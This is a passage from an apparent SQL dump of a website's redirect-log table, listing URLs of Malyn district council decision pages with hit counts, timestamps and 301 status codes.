00:00:00',301),(16583,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/102-pro-polozhennja-pro-postijni-komisii-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',13,0,'2015-11-02 12:22:45','0000-00-00 00:00:00',301),(16584,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/103-pro-reglament-roboti-rajonnoi-radi','','','',16,0,'2015-11-02 12:22:47','0000-00-00 00:00:00',301),(16585,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/103-pro-reglament-roboti-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',13,0,'2015-11-02 12:22:48','0000-00-00 00:00:00',301),(16586,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/105-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2010?tmpl=component&print=1&layout=default&page=','','','',13,0,'2015-11-02 12:22:52','0000-00-00 00:00:00',301),(16587,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/116-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_3','','','',5,0,'2015-11-02 12:22:54','0000-00-00 00:00:00',301),(16588,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/166-pro-hid-vikonannja-rajonnoi-programi-vidpochinku_2','','','',2,0,'2015-11-02 12:22:55','0000-00-00 00:00:00',301),(16589,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/98-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_4','','','',11,0,'2015-11-02 12:22:57','0000-00-00 00:00:00',301),(16590,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/99-pro-utvorennja-prezidii-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',13,0,'2015-11-02 12:23:00','0000-00-00 00:00:00',301),(16591,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/188-pro-vnesennja-zmin-do-polozhennja-pro-konkursnij','','','',2,0,'2015-11-02 12:23:01','0000-00-00 00:00:00',301),(16592,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/314-pro-inicijuvannja-peredachi-u-spilnu-vlasnist','','','',11,0,'2015-11-02 12:23:02','0000-00-00 00:00:00',301),(16593,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16082013-/585-pro-zgodu-na-peredachu-mizhbjudzhetnogo-transfertu?tmpl=component&print=1&layout=default&page=','','','',14,0,'2015-11-02 12:23:04','0000-00-00 00:00:00',301),(16594,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/145-pro-hid-vikonannja-rajonnoi-programi-zaluchennja','','','',9,0,'2015-11-02 12:23:10','0000-00-00 00:00:00',301),(16595,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/145-pro-hid-vikonannja-rajonnoi-programi-zaluchennja?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:23:12','0000-00-00 00:00:00',301),(16596,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/201-pro-vnesennja-zmin-ta-dopovnen-do-rishennja','','','',13,0,'2015-11-02 12:23:13','0000-00-00 00:00:00',301),(16597,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/201-pro-vnesennja-zmin-ta-dopovnen-do-rishennja?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:23:15','0000-00-00 00:00:00',301),(16598,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/208-pro-zatverdzhennja-polozhennja-pro-orendu-majna?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:23:18','0000-00-00 00:00:00',301),(16599,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/209-pro-zvit-kerivnikiv-komunalnih-pidpriemstv','','','',9,0,'2015-11-02 12:23:19','0000-00-00 00:00:00',301),(16600,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/209-pro-zvit-kerivnikiv-komunalnih-pidpriemstv?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:23:21','0000-00-00 00:00:00',301),(16601,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/210-pro-stan-vikonannja-rishennja-malinskoi-rajonnoi','','','',9,0,'2015-11-02 12:23:22','0000-00-00 00:00:00',301),(16602,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/210-pro-stan-vikonannja-rishennja-malinskoi-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:23:24','0000-00-00 00:00:00',301),(16603,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/214-pro-zvit-golovi-rajonnoi-derzhavnoi-administracii','','','',9,0,'2015-11-02 12:23:26','0000-00-00 00:00:00',301),(16604,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/214-pro-zvit-golovi-rajonnoi-derzhavnoi-administracii?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:23:27','0000-00-00 00:00:00',301),(16605,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/216-pro-zminu-nazvi-navchalnih-zakladiv-rajonu','','','',9,0,'2015-11-02 12:23:28','0000-00-00 00:00:00',301),(16606,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/216-pro-zminu-nazvi-navchalnih-zakladiv-rajonu?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:23:30','0000-00-00 00:00:00',301),(16607,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/224-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2011_5','','','',9,0,'2015-11-02 12:23:31','0000-00-00 00:00:00',301),(16608,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/224-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2011_5?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:23:33','0000-00-00 00:00:00',301),(16609,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/226-pro-zatverdzhennja-rajonnoi-programi-vidpochinku','','','',9,0,'2015-11-02 12:23:34','0000-00-00 00:00:00',301),(16610,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/226-pro-zatverdzhennja-rajonnoi-programi-vidpochinku?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:23:36','0000-00-00 00:00:00',301),(16611,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/227-pro-zatverdzhennja-rajonnoi-programi-rozvitku_2','','','',9,0,'2015-11-02 12:23:38','0000-00-00 00:00:00',301),(16612,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/227-pro-zatverdzhennja-rajonnoi-programi-rozvitku_2?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:23:39','0000-00-00 00:00:00',301),(16613,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/229-pro-vnesennja-i-zatverdzhennja-zmin-do-statutu','','','',5,0,'2015-11-02 12:23:41','0000-00-00 00:00:00',301),(16614,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/232-pro-formuvannja-statutnih-fondiv-pidpriemstv-shho','','','',5,0,'2015-11-02 12:23:42','0000-00-00 00:00:00',301),(16615,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/233-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_9','','','',9,0,'2015-11-02 12:23:44','0000-00-00 00:00:00',301),(16616,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/233-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_9?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:23:45','0000-00-00 00:00:00',301),(16617,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/234-pro-vnesennja-zmin-do-skladu-rajonnoi-profesijnoi','','','',9,0,'2015-11-02 12:23:47','0000-00-00 00:00:00',301),(16618,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/234-pro-vnesennja-zmin-do-skladu-rajonnoi-profesijnoi?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:23:48','0000-00-00 00:00:00',301),(16619,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/238-pro-prijnjattja-u-spilnu-vlasnist-teritorialnih','','','',9,0,'2015-11-02 12:23:50','0000-00-00 00:00:00',301),(16620,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/238-pro-prijnjattja-u-spilnu-vlasnist-teritorialnih?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:23:51','0000-00-00 00:00:00',301),(16621,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/239-pro-zatverdzhennja-rajonnoi-cilovoi-socialnoi','','','',11,0,'2015-11-02 12:23:53','0000-00-00 00:00:00',301),(16622,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/239-pro-zatverdzhennja-rajonnoi-cilovoi-socialnoi?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:23:54','0000-00-00 00:00:00',301),(16623,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/240-pro-programu-socialno-ekonomichnogo-rozvitku_2','','','',11,0,'2015-11-02 12:23:56','0000-00-00 00:00:00',301),(16624,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/240-pro-programu-socialno-ekonomichnogo-rozvitku_2?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:23:57','0000-00-00 00:00:00',301),(16625,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/241-pro-vnesennja-zmin-do-skladu-rajonnoi-profesijnoi_2','','','',9,0,'2015-11-02 12:23:59','0000-00-00 00:00:00',301),(16626,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/241-pro-vnesennja-zmin-do-skladu-rajonnoi-profesijnoi_2?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:24:00','0000-00-00 00:00:00',301),(16627,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/242-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_2','','','',9,0,'2015-11-02 12:24:02','0000-00-00 00:00:00',301),(16628,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/242-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_2?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:24:03','0000-00-00 00:00:00',301),(16629,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/245-pro-vstanovlennja-nadbavki-do-posadovogo-okladu?tmpl=component&print=1&layout=default&page=','','','',15,0,'2015-11-02 12:24:05','0000-00-00 00:00:00',301),(16630,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/246-pro-zminu-nazvi-navchalnih-zakladiv-rajonu_2','','','',9,0,'2015-11-02 12:24:06','0000-00-00 00:00:00',301),(16631,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/246-pro-zminu-nazvi-navchalnih-zakladiv-rajonu_2?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:24:08','0000-00-00 00:00:00',301),(16632,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/247-pro-zatverdzhennja-rajonnoi-kompleksnoi-programi','','','',9,0,'2015-11-02 12:24:09','0000-00-00 00:00:00',301),(16633,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/247-pro-zatverdzhennja-rajonnoi-kompleksnoi-programi?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:24:11','0000-00-00 00:00:00',301),(16634,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/248-pro-nadannja-pilgi-z-orendnoi-plati-upravlinnju','','','',9,0,'2015-11-02 12:24:13','0000-00-00 00:00:00',301),(16635,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/248-pro-nadannja-pilgi-z-orendnoi-plati-upravlinnju?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:24:14','0000-00-00 00:00:00',301),(16636,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/5-pro-zatverdzhennja-tehnichnoi-dokumentacii-po','','','',9,0,'2015-11-02 12:24:16','0000-00-00 00:00:00',301),(16637,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/5-pro-zatverdzhennja-tehnichnoi-dokumentacii-po?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:24:17','0000-00-00 00:00:00',301),(16638,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-?limitstart=0','','','',9,0,'2015-11-02 12:24:19','0000-00-00 00:00:00',301),(16639,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/803-pro-plan-roboti-rajonnoi-radi-na-ii-pivrichchja_3?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-02 12:24:21','0000-00-00 00:00:00',301),(16640,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/804-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_6?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-02 12:24:22','0000-00-00 00:00:00',301),(16641,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/808-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_14','','','',7,0,'2015-11-02 12:24:27','0000-00-00 00:00:00',301),(16642,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/823-pro-pripinennja-kontraktu-z-kerivnikom-kp','','','',14,0,'2015-11-02 12:24:29','0000-00-00 00:00:00',301),(16643,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/824-pro-stan-nadannja-medichnoi-dopomogi-zhiteljam','','','',11,0,'2015-11-02 12:24:31','0000-00-00 00:00:00',301),(16644,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/93-pro-zatverdzhennja-cilovoi-rajonnoi-programi','','','',9,0,'2015-11-02 12:24:35','0000-00-00 00:00:00',301),(16645,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/430-pro-programu-zabezpechennja-deputatskoi-dijalnosti_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-02 12:24:37','0000-00-00 00:00:00',301),(16646,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/440-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_18','','','',10,0,'2015-11-02 12:24:39','0000-00-00 00:00:00',301),(16647,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/152-pro-peredachu-neruhomogo-majna','','','',9,0,'2015-11-02 12:24:45','0000-00-00 00:00:00',301),(16648,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/275-pro-zatverdzhennja-novogo-skladu-komisii-rajonnoi_2?tmpl=component&print=1&layout=default&page=','','','',10,0,'2015-11-02 12:24:47','0000-00-00 00:00:00',301),(16649,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/333-pro-vikonannja-planu-roboti-rajonnoi-radi-za-i','','','',2,0,'2015-11-02 12:24:49','0000-00-00 00:00:00',301),(16650,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/341-pro-zatverdzhennja-polozhennja-pro-orendu-majna_2?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-02 12:24:51','0000-00-00 00:00:00',301),(16651,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/342-pro-zatverdzhennja-polozhennja-pro-teritorialnij','','','',9,0,'2015-11-02 12:24:53','0000-00-00 00:00:00',301),(16652,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/343-pro-zatverdzhennja-polozhennja-pro-porjadok_3','','','',2,0,'2015-11-02 12:24:54','0000-00-00 00:00:00',301),(16653,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/350-pro-zatverdzhennja-tehnichnoi-dokumentacii-po_5','','','',2,0,'2015-11-02 12:24:56','0000-00-00 00:00:00',301),(16654,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/615-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_12','','','',10,0,'2015-11-02 12:24:59','0000-00-00 00:00:00',301),(16655,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/230-pro-vnesennja-zmin-do-rajonnoi-programi-shhodo','','','',9,0,'2015-11-02 12:25:10','0000-00-00 00:00:00',301),(16656,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/660-pro-situaciju-iz-obslugovuvannjam-miscevih','','','',11,0,'2015-11-02 12:25:18','0000-00-00 00:00:00',301),(16657,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/737-pro-zatverdzhennja-programi-polipshennja-stanu','','','',3,0,'2015-11-02 12:25:20','0000-00-00 00:00:00',301),(16658,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30122010-/171-pro-programu-socialno-ekonomichnogo-rozvitku?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-02 12:25:23','0000-00-00 00:00:00',301),(16659,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30122010-/84-rishennja-prijnjati-na-3-sesii-rajonnoi-radi-6?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-02 12:25:28','0000-00-00 00:00:00',301),(16660,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/132-perelik-rishen-prijnjatih-na-5-sesii-rajonnoi-radi','','','',9,0,'2015-11-02 12:25:29','0000-00-00 00:00:00',301),(16661,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/132-perelik-rishen-prijnjatih-na-5-sesii-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:25:30','0000-00-00 00:00:00',301),(16662,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/133-pro-zatverdzhennja-zvitu-pro-vikonannja-rajonnogo_2','','','',18,0,'2015-11-02 12:25:32','0000-00-00 00:00:00',301),(16663,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/133-pro-zatverdzhennja-zvitu-pro-vikonannja-rajonnogo_2?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-02 12:25:33','0000-00-00 00:00:00',301),(16664,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/134-pro-vnesennja-zmin-do-reglamentu-roboti-rajonnoi_2','','','',10,0,'2015-11-02 12:25:35','0000-00-00 00:00:00',301),(16665,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/134-pro-vnesennja-zmin-do-reglamentu-roboti-rajonnoi_2?tmpl=component&print=1&layout=default&page=','','','',13,0,'2015-11-02 12:25:36','0000-00-00 00:00:00',301),(16666,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/135-pro-plan-roboti-rajonnoi-radi-na-ii-pivrichchja_2','','','',9,0,'2015-11-02 12:25:38','0000-00-00 00:00:00',301),(16667,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/176-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_5','','','',14,0,'2015-11-02 12:25:39','0000-00-00 00:00:00',301),(16668,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/176-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_5?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-02 12:25:41','0000-00-00 00:00:00',301),(16669,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/177-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_6?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-02 12:25:42','0000-00-00 00:00:00',301),(16670,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011?limitstart=0','','','',9,0,'2015-11-02 12:25:47','0000-00-00 00:00:00',301),(16671,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/481-pro-zminu-nazvi-ta-zatverdzhennja-statutu','','','',3,0,'2015-11-02 12:25:51','0000-00-00 00:00:00',301),(16672,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/489-pro-zatverdzhennja-polozhennja-pro-teritorialnij_2?tmpl=component&print=1&layout=default&page=','','','',10,0,'2015-11-02 12:25:54','0000-00-00 00:00:00',301),(16673,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/490-pro-pogodzhennja-perejmenuvannja-naselenogo-punktu','','','',3,0,'2015-11-02 12:25:56','0000-00-00 00:00:00',301),(16674,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/491-pro-zatverdzhennja-polozhennja-pro-vidznaku-90','','','',15,0,'2015-11-02 12:25:57','0000-00-00 00:00:00',301),(16675,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/492-pro-zatverdzhennja-rajonnoi-kompleksnoi-programi_3','','','',13,0,'2015-11-02 12:25:59','0000-00-00 00:00:00',301),(16676,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/13-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi','','','',2,0,'2015-11-02 12:26:00','0000-00-00 00:00:00',301),(16677,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/8-pro-zatverdzhennja-metodiki-rozrahunku-orendnoi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-02 12:26:02','0000-00-00 00:00:00',301),(16678,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/9-pro-zminu-nazvi-ta-zatverdzhennja-polozhennja','','','',7,0,'2015-11-02 12:26:03','0000-00-00 00:00:00',301),(16679,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/63-pro-utvorennja-robochoi-komisii-z-pidgotovki','','','',13,0,'2015-11-02 12:26:05','0000-00-00 00:00:00',301),(16680,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/63-pro-utvorennja-robochoi-komisii-z-pidgotovki?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-02 12:26:06','0000-00-00 00:00:00',301),(16681,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/64-pro-obrannja-zastupnika-golovi-rajonnoi-radi','','','',12,0,'2015-11-02 12:26:08','0000-00-00 00:00:00',301),(16682,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/65-pro-vstanovlennja-nadbavki','','','',11,0,'2015-11-02 12:26:09','0000-00-00 00:00:00',301),(16683,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/66-pro-utvorennja-postijnih-komisij-rajonnoi-radi','','','',14,0,'2015-11-02 12:26:11','0000-00-00 00:00:00',301),(16684,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/66-pro-utvorennja-postijnih-komisij-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-02 12:26:12','0000-00-00 00:00:00',301),(16685,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/67-pro-zatverdzhennja-strukturi-ta-chiselnosti','','','',4,0,'2015-11-02 12:26:14','0000-00-00 00:00:00',301),(16686,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/67-pro-zatverdzhennja-strukturi-ta-chiselnosti?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-02 12:26:15','0000-00-00 00:00:00',301),(16687,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/73-pro-obrannja-golovi-rajonnoi-radi','','','',3,0,'2015-11-02 12:26:17','0000-00-00 00:00:00',301),(16688,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/74-pro-prisvoennja-golovi-rajonnoi-radi-rangu','','','',9,0,'2015-11-02 12:26:18','0000-00-00 00:00:00',301),(16689,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/125-porjadok-dennij-4-sesii-6-sklikannja','','','',6,0,'2015-11-02 12:26:20','0000-00-00 00:00:00',301),(16690,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/125-porjadok-dennij-4-sesii-6-sklikannja?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-02 12:26:21','0000-00-00 00:00:00',301),(16691,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/126-pro-zatverdzhennja-zvitu-pro-vikonannja-rajonnogo','','','',6,0,'2015-11-02 12:26:23','0000-00-00 00:00:00',301),(16692,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/126-pro-zatverdzhennja-zvitu-pro-vikonannja-rajonnogo?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-02 12:26:24','0000-00-00 00:00:00',301),(16693,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/127-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2011','','','',6,0,'2015-11-02 12:26:26','0000-00-00 00:00:00',301),(16694,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/127-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2011?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-02 12:26:27','0000-00-00 00:00:00',301),(16695,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/128-pro-zatverdzhennja-rozmiru-vartosti-produktiv','','','',8,0,'2015-11-02 12:26:29','0000-00-00 00:00:00',301),(16696,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/128-pro-zatverdzhennja-rozmiru-vartosti-produktiv?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-02 12:26:30','0000-00-00 00:00:00',301),(16697,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/129-pro-rozpodil-vikoristannja-koshtiv-shho-nadhodjat?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-02 12:26:31','0000-00-00 00:00:00',301),(16698,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/81-rishennja-prijnjati-na-4-sesii-malinskoi-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-02 12:26:33','0000-00-00 00:00:00',301),(16699,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-16-06-2015-roku/1111-pro-informatsiyu-prokuraturi-malinskogo-rajonu-pro-stan-zakonnosti-zakhodi-shchodo-jiji-zmitsnennya-ta-rezultati-diyalnosti-na-teritoriji-rajonu','','','',5,0,'2015-11-02 12:26:34','0000-00-00 00:00:00',301),(16700,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-16-06-2015-roku/1125-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-02 12:26:36','0000-00-00 00:00:00',301),(16701,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/859-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2014-rik','','','',2,0,'2015-11-02 12:26:37','0000-00-00 00:00:00',301),(16702,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/860-pro-nadannya-prava-malinskij-rajonnij-radi-zdijsniti-pererakhuvannya-koshtiv','','','',9,0,'2015-11-02 12:26:39','0000-00-00 00:00:00',301),(16703,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/860-pro-nadannya-prava-malinskij-rajonnij-radi-zdijsniti-pererakhuvannya-koshtiv?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-02 12:26:40','0000-00-00 00:00:00',301),(16704,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/861-pro-nadannya-dozvolu-na-vlashtuvannya-martinenko-l-ya-do-chopovitskogo-statsionarnogo-viddilennya-postijnogo-prozhivannya-odinokikh-nepratsezdatnikh-gromadyan','','','',3,0,'2015-11-02 12:26:42','0000-00-00 00:00:00',301),(16705,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/862-pro-nadannya-dozvolu-na-vlashtuvannya-murgi-p-o-do-chopovitskogo-statsionarnogo-viddilennya-postijnogo-prozhivannya-odinokikh-nepratsezdatnikh-gromadyan','','','',3,0,'2015-11-02 12:26:43','0000-00-00 